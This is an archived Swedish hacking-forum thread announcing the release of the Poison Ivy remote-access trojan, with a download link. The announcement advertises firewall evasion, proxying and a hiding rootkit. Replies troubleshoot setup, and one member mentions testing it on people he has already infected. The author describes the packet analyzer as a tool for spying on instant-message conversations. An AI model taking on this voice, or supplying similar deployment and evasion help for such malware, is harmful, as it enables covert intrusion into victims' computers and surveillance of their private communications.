Help - Search - Members - Calendar
Full Version: [rel] Poison Ivy v1.0.0
SweRAT > SweRAT > SweRAT regler, nyheter och information
shapeless
2005-11-27 22:16
Nu är den äntligen klar! biggrin.gif

QUOTE
Poison Ivy är ett avancerat fjärrstyrningsprogram (RAT) som tillåter dig att fjärrstyra även datorer som är bakom routrar och brandväggar. Det gäller även brandväggar som normalt detekterar när dll:er injiceras i andra processer. Den är en av de mest anonyma verktygen som finns, med förmågan att ansluta genom proxy, all traffik är krypterad och ett inbyggt rootkit som gömmer bla. anslutningen.


Finns att hämta här: http://www.swerat.com/downloads.php?file=PoisonIvy
remda
2005-11-27 22:29
Jippi! Bra jobbat! biggrin.gif
Det ska bli spännande att testa den.
Orbitaljl
2005-11-28 00:37
för kommer mitt användare fram, sen försvinner det på ½ sekund, sen efter ca 30 sek kommer det igen och försvinner på ½ sekund.. vad är fel? ohmy.gif
shapeless
2005-11-28 00:43
QUOTE(Orbitaljl @ Nov 27 2005, 11:49 PM)
för kommer mitt användare fram, sen försvinner det på ½ sekund, sen efter ca 30 sek kommer det igen och försvinner på ½ sekund.. vad är fel?  ohmy.gif
*


Fel lösenord.


edit: Till alla som laddade ner programmet innan klockan 23:10: Ladda ner programmet igen! Fel version laddades upp tidigare istället för den nya buggfixade versionen. sad.gif
crazyboris
2005-11-28 21:54
funkar skitbra.. och snabb är den med..
väntar redan på nästa version...
kapiten
2005-11-28 23:51
QUOTE(ShapeLeSS @ Nov 27 2005, 11:55 PM)
QUOTE(Orbitaljl @ Nov 27 2005, 11:49 PM)
för kommer mitt användare fram, sen försvinner det på ½ sekund, sen efter ca 30 sek kommer det igen och försvinner på ½ sekund.. vad är fel?  ohmy.gif
*


Fel lösenord.


edit: Till alla som laddade ner programmet innan klockan 23:10: Ladda ner programmet igen! Fel version laddades upp tidigare istället för den nya buggfixade versionen. sad.gif
*




jag har samma problem som Orbitaljl, har testat att tanka nya versionen men det hjälper inte. försökte tanka den från chasenet ochkså men där fanns den inte på servern enligt det käcka felmeddelandet jag fick

Edit: nu vet jag varför det inte fungerade på chasenet. filen är rar men länken leder till en zip (som inte finns)
shapeless
2005-11-29 00:23
QUOTE(kapiten @ Nov 28 2005, 11:03 PM)
Jag har samma problem som Orbitaljl, har testat att tanka nya versionen men det hjälper inte. försökte tanka den från chasenet ochkså men där fanns den inte på servern enligt det käcka felmeddelandet jag fick

Edit: nu vet jag varför det inte fungerade på chasenet. filen är rar men länken leder till en zip (som inte finns)
*


Felet Orbitaljl hade har inget att göra med vilken fil han hade. Han hade, som jag skrev, fel lösenord i klienten.
kapiten
2005-11-29 00:32
QUOTE(ShapeLeSS @ Nov 28 2005, 11:35 PM)
QUOTE(kapiten @ Nov 28 2005, 11:03 PM)
Jag har samma problem som Orbitaljl, har testat att tanka nya versionen men det hjälper inte. försökte tanka den från chasenet ochkså men där fanns den inte på servern enligt det käcka felmeddelandet jag fick

Edit: nu vet jag varför det inte fungerade på chasenet. filen är rar men länken leder till en zip (som inte finns)
*


Felet Orbitaljl hade har inget att göra med vilken fil han hade. Han hade, som jag skrev, fel lösenord i klienten.
*



okej. man ska ha samma lösenord på servrarna som på klienten va?
shapeless
2005-11-29 00:35
QUOTE(kapiten @ Nov 28 2005, 11:44 PM)
okej. man ska ha samma lösenord på servrarna som på klienten va?


Ja. (obs, stora och små bokstäver gör skillnad).
kapiten
2005-11-29 00:42
QUOTE(ShapeLeSS @ Nov 28 2005, 11:47 PM)
Ja. (obs, stora och små bokstäver gör skillnad).
*


hmm
får det ändå inte att fungera. varken för mig eller för användare från bifrost. är nog inte lösenordet som är fel då jag satt det till a. dock känns det som det har blivit lite bättre nu. nu är den framme ca ½ sekund och borta i ca 4 sekunder
ksv
2005-11-29 00:54
QUOTE(kapiten @ Nov 28 2005, 11:54 PM)
får det ändå inte att fungera. varken för mig eller för vics från bifrost.
Vet inte om jag missförstod dig, men du kan alltså inte köra bifrost servrar med Poison Ivy.
kapiten
2005-11-29 09:20
QUOTE(ksv @ Nov 29 2005, 12:06 AM)
QUOTE(kapiten @ Nov 28 2005, 11:54 PM)
får det ändå inte att fungera. varken för mig eller för användare från bifrost.
Vet inte om jag missförstod dig, men du kan alltså inte köra bifrost servrar med Poison Ivy.
*



du missförstod mig. jag menade att jag hade infekterat användare som redan har min bifrost server för att testa om det fungerade.
Andvare
2005-11-29 19:15
Jag har inte hunnit prova den så mycket ännu men av det jag har sett verkar den riktigt bra smile.gif Vi kanske får ta och börja rekommendera den istället för bifrost wink.gif Den där packet analyzern verkar häftig men jag har ingen aning om vad man kan använda den till, har du något förslag på tillämpning shapeless? Socks4 är ju också väldigt bra. Är anslutningen till socks4 proxyn krypterad eller sänds själva målipadressen i klartext? Hur pass skyddad är ipadressen i servern, står den i klartext eller är den krypterad med en slumpmässig nyckel och dold i ett hav av antidebugtekniker? Eller kanske något mittemellan? Man vill ju veta hur pass skyddad man är smile.gif
QUOTE
Fel lösenord.

Vad har man lösenord till egentligen? Är det klienten som kollar att servern har rätt lösenord eller tvärtom?
Farbror
2005-11-30 10:25
Det är en mkt fin RAT biggrin.gif
Ja är lite kär rolleyes.gif
shapeless
2005-11-30 16:47
QUOTE(Andvare @ Nov 29 2005, 17:27)
Jag har inte hunnit prova den så mycket ännu men av det jag har sett verkar den riktigt bra smile.gif Vi kanske får ta och börja rekommendera den istället för bifrost wink.gif Den där packet analyzern verkar häftig men jag har ingen aning om vad man kan använda den till, har du något förslag på tillämpning shapeless? Socks4 är ju också väldigt bra. Är anslutningen till socks4 proxyn krypterad eller sänds själva målipadressen i klartext? Hur pass skyddad är ipadressen i servern, står den i klartext eller är den krypterad med en slumpmässig nyckel och dold i ett hav av antidebugtekniker? Eller kanske något mittemellan? Man vill ju veta hur pass skyddad man är smile.gif
QUOTE
Fel lösenord.

Vad har man lösenord till egentligen? Är det klienten som kollar att servern har rätt lösenord eller tvärtom?
*



Packet analyzern är ju tänkt som ett spionverktyg. (kolla på IM-konversationer m.m).
Socks4-trafiken sker ju såklart okrypterat eftersom den använder en oberoende socks4-server. IP skickas i in_addr-struktur vilket gör att den inte står direkt i klarform (men ändå inte omöjligt få fram från socks4-trafiken).

Lösenordet är själva RC4-krypteringsnyckeln. Och om den är fel i klienten så är det helt omöjligt att få fram rätt data som servern skickar, och då stängs anslutningen. Det är därför anslutningen bara "flashar" förbi om man har fel lösenord.

Alla inställningar står i "klartext" i servern. :\
Andvare
2005-11-30 17:06
QUOTE
Socks4-trafiken sker ju såklart okrypterat eftersom den använder en oberoende socks4-server.

Okej, jag visste inte riktigt hur socks4 protokollet var uppbyggt, det kanske använde ssl eller nått.
QUOTE
Lösenordet är själva RC4-krypteringsnyckeln.

Aha, okej. Vet du om det är samma för bifrost? För jag har aldrig tidigare förstått vad man har för användning av ett lösenord när man använder reverseconnection.
QUOTE
Det är därför anslutningen bara "flashar" förbi om man har fel lösenord.

Hmm, du kanske kunde kolla innan du visar anslutningen att den har rätt lösenord, har man ett par servrar med fel lösen som försöker ansluta var tionde sekund, eller vad det är, kan det bli lite som www.seizurerobots.com.

Hur ställer du dig till plugins förresten? Är det ett nono som för bifrost eller något du kan tänka dig? Om du vill undvika spam- och DoS-plugins kanske du kunde använda dig av någon form av signering och bara signa sådana du har godkännt?
shapeless
2005-11-30 17:49
QUOTE(Andvare @ Nov 30 2005, 15:18)
Hmm, du kanske kunde kolla innan du visar anslutningen att den har rätt lösenord, har man ett par servrar med fel lösen som försöker ansluta var tionde sekund, eller vad det är, kan det bli lite som www.seizurerobots.com.
Ska leka runt lite med det. Kanske även låta visa en inputbox vid fel lösenord så att man har chansen att testa nytt...

QUOTE(Andvare @ Nov 30 2005, 15:18)
Hur ställer du dig till plugins förresten? Är det ett nono som för bifrost eller något du kan tänka dig? Om du vill undvika spam- och DoS-plugins kanske du kunde använda dig av någon form av signering och bara signa sådana du har godkännt?
*
Nästa version, som jag redan börjat på, kommer använda sig av ett plugin-liknande system. Hurvida jag ska låta folk göra egna plugins är osäkert. DDoS- och spamplugins vill man såklart undvika. Har inte funderat så mkt på det än.
RM1212
2006-04-27 16:23
synd bara att den inte stödjer win98 som man själv sitter på sad.gif
SD-XI
2006-05-07 19:25
QUOTE(RM1212 @ Apr 27 2006, 13:35) *
synd bara att den inte stödjer win98 som man själv sitter på sad.gif

Jag har gjord ett plugin som gör att den funkar på win98
men den är hemligt...å jag vill inte säga till dig
negative
2006-11-13 20:11
fel
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2012 Invision Power Services, Inc.